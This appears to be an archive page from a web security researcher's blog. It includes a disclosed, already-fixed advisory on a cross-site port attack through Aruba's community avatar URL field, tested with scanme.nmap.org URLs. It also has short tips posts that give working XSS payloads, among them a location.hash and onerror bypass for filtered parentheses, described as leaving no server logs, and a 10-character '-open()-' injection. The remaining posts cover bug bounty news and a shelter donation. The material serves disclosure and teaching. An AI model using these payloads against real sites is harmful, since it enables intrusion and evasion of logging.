David Sopas

web security researcher

David Sopas – Web Security Researcher
START READING
08/08/15 Advisories # , , ,

ArubaNetworks Avatar Image XSPA

ArubaNetworks Avatar Image XSPA

I found out that was possible to run a XSPA [Cross Site Port Attacks] using Avatar URL option on any registered community profile.
XSPA allows attackers to abuse available functionality in most web applications to port scan intranet and external Internet facing servers.
An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from the server.

Proof-of-concept:
In this type of attack I always use Nmap testing machine – scanme.nmap.org to check what ports are open on the server.
Using Nmap on my operating system I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I now entered the following external URL on my Avatar web option – https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal:
http://scanme.nmap.org:80/

No server error.

I modified it to:
http://scanme.nmap.org:81/

And after to:
http://scanme.nmap.org:443/

The following errors were returned on the server:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />

 

Aruba security team already fixed this issue so I decided to share with you guys.

0 likes no responses
06/08/15 Interesting Readings , News # , ,

Details on the Cross-Site Request Forgery Vulnerability Disclosed at Black Hat

0 likes no responses
06/08/15 Bug Bounty , Swag # , ,

First to reach 1000 rep score on Cobalt.io

First to reach 1000 rep score on Cobalt.io

Yes! I made it.

Since my registration on March this year I reached more than 1000 reputation points on Cobalt.io and become the first to do it.
Most of the points were made on private/invite only programs but a couple of them were also public in companies like Nexmo, Weebly, DoSomething and Circle.

My next goal? Keep having fun with the guys on Cobalt.io. They’ve a great team and are supported by many talented security researchers.

If you are a company who needs security checked by professionals just register your program.

0 likes no responses
06/08/15 Bug Bounty , Donations # , ,

Sharing is caring!

Sharing is caring!

I always try to help the local dogs and cats shelter with food and medications.
Some extra cash from bug bounties helped me to give more often so I try to do my best.

The reward is priceless! Dogs and cats that were abandoned with a better way of life.

Hope you guys do the same…

0 likes no responses
04/08/15 Tips and Tricks # ,

No parenteses allowed? location.hash is here

No parenteses allowed? location.hash is here

I come across a web application in a bounty private program that reflected my var – xss – with the following code:

var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax('search', ''); }
catch(ex) { setTimeout(\"s_callAjax('search', '');\", 2000);}", 50);

So what I tried next was to put a XSS vector in place:

</pre>
<pre>vuln-site/?t=xss;alert(1);//</pre>
<pre>

Which reflected:

var _s_tab = xss;alert1;//;

So it removed the () chars… I thought to myself – A Challenge!

My next step was to try something that I already used in a previous research.
Use location.hash and then execute my attack.

vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>

The other good thing about this type of attack is that the payload is in part of the url hash and is therefore never sent to the server. (no servers logs of actual attack payload)

0 likes no responses
04/08/15 Tips and Tricks # ,

Tiny XSS vector

I needed a small XSS vector that could fit in a 10 char limit variable in a limit 10 char on a private client to show him that limiting chars on a variable is not secure…

central.push({ 'var1': 'INJECT_HERE' });

So after some attempts I was unable to find one so I called for help 🙂

@soaj1664ashar 10 char fun: ‘-open()-‘

Making a valid Javascript:

central.push({ 'var1': ''-open()-'' });

This XSS vector only opens a new tab/window but in my clients case it was stored in a cookie so it was a pain in the ass to close a window each time he navigated in his web application.

Nice catch!

0 likes no responses
03/08/15 News #

Exploits start against flaw

0 likes no responses
1 5 6 7 8 9